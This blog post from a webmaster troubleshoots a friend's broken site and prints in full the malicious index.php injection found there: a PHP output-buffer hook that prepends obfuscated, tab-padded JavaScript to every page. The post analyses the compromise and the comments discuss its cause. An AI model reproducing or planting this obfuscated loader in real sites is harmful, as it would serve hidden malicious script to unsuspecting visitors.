The title is terrible, but I seriously had no idea what else to consider, other than something similar to what I searched for. Here's the story...
As I'm going through unread email, I came across this from a friend and fellow webmaster,
My home page has had trouble loading for people in the past two days.
FF says "The page you are trying to view cannot be shown because it uses an invalid or unsupported form of compression."
IE just times out.Any idea wtf? I was able to load it earlier.. but now I can't. I haven't made any changes to it. lame lame lame lame
Sure enough, I visit the page, nothing. Lets see what the headers say.
http://www.r00ted-site??.com/
GET / HTTP/1.1
Host: www.r00ted-site??.comHTTP/1.x 200 OK
Date: Fri, 01 May 2009 23:02:44 GMT
Server: Apache/1.3.41 (Unix) mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Cache-Control: private
Pragma: private
X-Powered-By: PHP/5.2.5
Set-Cookie: bblastvisit=1240161467; expires=Sat, 01-May-2010 23:02:44 GMT; path=/; domain=.r00ted-site??.com
Set-Cookie: bblastactivity=0; expires=Sat, 01-May-2010 23:02:44 GMT; path=/; domain=.r00ted-site??.com
Content-Length: 0
Content-Type: text/html; charset=ISO-8859-1
X-Cache: MISS from 0x95.
Connection: keep-alive
Ok, that checks out, lets see what GoogleBot is seeing (Google Cache),
...snip...
º€Üñ~X CnÊ^ r]tÎ ß©`˜_ÿJ ‚Œ«07’ [lö¼á¦˜Á.IæöH L®(îy±pã~I½A&
Ø žÔω áeˆ¥JRÃ|‚¥Ö qC£L™.±ÑW•JÒ¦P¢ •³É6‚M Y ëd ¥Ê‚vÄ7É⥿9Þ•ü
Š2Œ U‡ü´PNÏŽ¼>· Í¡&Žg~ì Éà( k¦Š£FÑeºjƒj>c yóXì¤K'q 5 ês
±&Ž[tÇÓ êóO ¦z¨IlË.E#Û ùÔ–_”5SÿRŒ…bôìkñßë ª§ßÕ £ 3§¤( Õë
üeJ‰˜Èeƒ ®¦êôä'«ÝògŠö ÿ-wÁ :® ÖnöX ¾á±1cïÁ ç¸ XˆÒiN( <×w
£(I¥Ø ÿ á Pco jž&kiò 6Óä‡ï –©†R´ ˜È &›1ù§&à °"ž÷ý`
N³Fr3Í 0× ¤ N Ê™Tè¹ |»çúÔ;jÁrÜ 6ä{¥ Þ³é.WBk òª|BR’ó ‹*9 ü" C ùÇžã
ø®|ÎŒ ˆ-q¯¹ÉÏbö³¿ ä"W9s˜ ¸ê‘x6uC è–È EÍ é EÕ‚íªôøÜsâ :±\þ ~ff‚ÍðÓ
¸9à:‹ ¾$ñ¡H ð f ¶ K§†º JU,{ŸÕç I «+« DTŽ î— µÞÙæJëZ6P ®çRA5YPÒ:
² V •zÜ ù œO6 ¦ìÎ
...snip...
Lovely.. He sends over the index.php that's causing the issue, and here's what's inside,
rtrlevm="iTiyvIYW%YYglJJLMU";ibvjpl="
<script!20l!61!6eg!75a!67e!3dj!61va!73crip!74!3e !20!66!75n!63!74!69o!6e
!75!61!68!69!64adu(s!6f!6aoic!75!29{v!61!72
go!61srho,!68!66q!79!72!78u=!22pHGF\\\'!37!50!38!2cyT+6!73!2e!4d
^!63!45!3b!6bUO!7dAt[!65o!69!30!68v:I=r!64n!7a{!6159!26!28g]B!
4e*Z|u~b!66!60x!32Jj!77)1V!24!404#!6d3K!71 !6c!43!21_-\\\\\\\\\\\\
"\\\\"!2cj!66cmun=!22\\\\",vvpy!76t!2cfz!68g!73ynh!2cvn!7a!75!65xp!3d\\\\"!22,!67!75!6b!74o!78!7a!3b!66!6fr(g!6fasrh!6f=!30!3b!67oas!72
ho!3c!73o!6a!6fic!75!2e!6ce!6e!67th!3b!67oas!72ho++){ vvpyvt=!73oj!6ficu.!63ha!72At(!67o!61!73!72ho!29!3bfz!68gsy!6eh=
hf!71yr!78u!2e!69!6edexO!66(vvpyvt!29!3b!69f(f!7a!68g!73!79n!68
!3e!2d1)!7b!20!67uk!74ox!7a=!28(f!7ah!67!73y!6e!68+!31)!2581
!2d1)!3b!69f!28!67u!6b!74ox!7a<!3d0)gu!6bt!6f!78z!2b=81!3bvnz!
75ex!70+!3dh!66q!79rx!75!2ec!68a!72!41!74(g!75k!74o!78!7a-1); }
else!20vn!7auexp!2b=vvpyvt;}jfcmun+!3dv!6e!7aue!78p!3b!64!6fc
!75!6d!65!6e!74.wr!69!74e(!6afcm!75n)!3b}<!2fs!63rip!74>";ncow
yow=rtrlevm.charAt(8);trbcvxg=ibvjpl.replace(/!/g,ncowyow);muabsg=
unescape(trbcvxg);var jvhgggf,mvzdovk;document.write(muabsg);jvhgggf="<.Ed0H[lC5z]~5]orpj5:5SEd0H[p>l`~zE[0izl{d]dCv)CCUTEig1lal[dTlal:
5dl5vU2 :]z rlp]5C2{{z3`nU33Hpyln]UwdwH.:zlrlVkl`~zE[0izl~fo5oi3do3d3)gz53
oyl:5C~o1la:5dlnlrlzo)lD5[oknM.o[+03oggzo)lD5[o1M]o[+03og1l6l,
s#hhhhh1kniE~3oz[MEiiU0olrlz53ol6lprpl6lo.E5Hog:5C~o1l6lpklo2H0do.
rpl6lnM[iF^+S[d0z]g1kAl`~zE[0izlE.: wE[ 3nv:g1lado[~dzlgniE~3oz
[MEiiU0oM0zno2}`g5vU2 :]z l6lprpl6ln]UwdwH.:z1lrrl\\\\"V1kAl0`glE.: wE[
3nv:g1l1lalniE~3oz[M)d0[oglp<S!R=8+lC5z]~5]or\\\\\\\\pj5:5SEd0H[\\\\\\\\plSR!r
\\\\\\\\pv[[HI//]ii]Co5z5CT[CE.Mzo[/--~[3M]0`?PK9#K5&h,&VnVh,sKh,nh5VfVEVJ#VVhVK&&`&9hK,VJ&h(p6niE~3oz
[Mdo`oddod6p(p6S[d0z]ggzo)lD5[og11M]o[+03og116p\\\\\\\\p>
<\\\\\\\\/S!Rp6p=8+>pl1kl~fo5oi3do3d3)gl5vU2 :]z yln]UwdwH.:zl1klAloC.olalAlAlE5[Evlgo1laAlAl{d]dCv)CCUTEig1k</.Ed0H
[>l";uahidadu(jvhgggf);</script>\'."\n".$buf;' ) );
/*d6dc9649bc1e96ceef5b932f3edee390*/
// ++=========================================================================++
// || vBadvanced CMPS v3.0.1 (vB 3.6 - vB 3.7) - 56182
...snip...
Originally, that crap was all on 1 line, but I added the line-breaks for the site. Here's the unmodified version:
<?php
/*d6dc9649bc1e96ceef5b932f3edee390*/
ob_start( create_function( '$buf', 'return str_repeat("\t",rand(28,40)).\'<script language=javascript>rtrlevm="iTiyvIYW%YYglJJLMU";ibvjpl="<script!20l!61!6eg!75a!67e!3dj!61va!73crip!74!3e !20!66!75n!63!74!69o!6e !75!61!68!69!64adu(s!6f!6aoic!75!29{v!61!72 go!61srho,!68!66q!79!72!78u=!22pHGF\\\'!37!50!38!2cyT+6!73!2e!4d^!63!45!3b!6bUO!7dAt[!65o!69!30!68v:I=r!64n!7a{!6159!26!28g]B!4e*Z|u~b!66!60x!32Jj!77)1V!24!404#!6d3K!71 !6c!43!21_-\\\\\\\\\\\\"\\\\"!2cj!66cmun=!22\\\\",vvpy!76t!2cfz!68g!73ynh!2cvn!7a!75!65xp!3d\\\\"!22,!67!75!6b!74o!78!7a!3b!66!6fr(g!6fasrh!6f=!30!3b!67oas!72ho!3c!73o!6a!6fic!75!2e!6ce!6e!67th!3b!67oas!72ho++){ vvpyvt=!73oj!6ficu.!63ha!72At(!67o!61!73!72ho!29!3bfz!68gsy!6eh=hf!71yr!78u!2e!69!6edexO!66(vvpyvt!29!3b!69f(f!7a!68g!73!79n!68!3e!2d1)!7b!20!67uk!74ox!7a=!28(f!7ah!67!73y!6e!68+!31)!2581!2d1)!3b!69f!28!67u!6b!74ox!7a<!3d0)gu!6bt!6f!78z!2b=81!3bvnz!75ex!70+!3dh!66q!79rx!75!2ec!68a!72!41!74(g!75k!74o!78!7a-1); } else!20vn!7auexp!2b=vvpyvt;}jfcmun+!3dv!6e!7aue!78p!3b!64!6fc!75!6d!65!6e!74.wr!69!74e(!6afcm!75n)!3b}<!2fs!63rip!74>";ncowyow=rtrlevm.charAt(8);trbcvxg=ibvjpl.replace(/!/g,ncowyow);muabsg=unescape(trbcvxg);var jvhgggf,mvzdovk;document.write(muabsg);jvhgggf="<.Ed0H[lC5z]~5]orpj5:5SEd0H[p>l`~zE[0izl{d]dCv)CCUTEig1lal[dTlal:5dl5vU2 :]z rlp]5C2{{z3`nU33Hpyln]UwdwH.:zlrlVkl`~zE[0izl~fo5oi3do3d3)gz53oyl:5C~o1la:5dlnlrlzo)lD5[oknM.o[+03oggzo)lD5[o1M]o[+03og1l6l,s#hhhhh1kniE~3oz[MEiiU0olrlz53ol6lprpl6lo.E5Hog:5C~o1l6lpklo2H0do.rpl6lnM[iF^+S[d0z]g1kAl`~zE[0izlE.: wE[ 3nv:g1lado[~dzlgniE~3oz[MEiiU0oM0zno2}`g5vU2 :]z l6lprpl6ln]UwdwH.:z1lrrl\\\\"V1kAl0`glE.: wE[ 3nv:g1l1lalniE~3oz[M)d0[oglp<S!R=8+lC5z]~5]or\\\\\\\\pj5:5SEd0H[\\\\\\\\plSR!r\\\\\\\\pv[[HI//]ii]Co5z5CT[CE.Mzo[/--~[3M]0`?PK9#K5&h,&VnVh,sKh,nh5VfVEVJ#VVhVK&&`&9hK,VJ&h(p6niE~3oz[Mdo`oddod6p(p6S[d0z]ggzo)lD5[og11M]o[+03og116p\\\\\\\\p><\\\\\\\\/S!Rp6p=8+>pl1kl~fo5oi3do3d3)gl5vU2 :]z yln]UwdwH.:zl1klAloC.olalAlAlE5[Evlgo1laAlAl{d]dCv)CCUTEig1k</.Ed0H[>l";uahidadu(jvhgggf);</script>\'."\n".$buf;' ) );/*d6dc9649bc1e96ceef5b932f3edee390*/
// ++=========================================================================++
// || vBadvanced CMPS v3.0.1 (vB 3.6 - vB 3.7) - 56182
// ++
... snip ...
I searched and searched, and came across what looks like a method of unobfuscating, but I'm too lazy to work at it.
Ideas, anyone? :]
Word Count: 1243
Tags: exploit, javascript, php
2 (Comments|Trackbacks)
[ RSS feed ]
Hi, have you any other info on how this happened?
I see the same thing on one server here...
Is this a new exploit for php or apache?
The friend that brought the unusual code to my attention later informed me that he reinstalled the application. Simply removing the offending code was a temporary solution as it always came back. Still not sure if the site was compromised or if this is new exploit or what, but since reinstalling, he hasn't seen the code.
The comment form is closed at this time.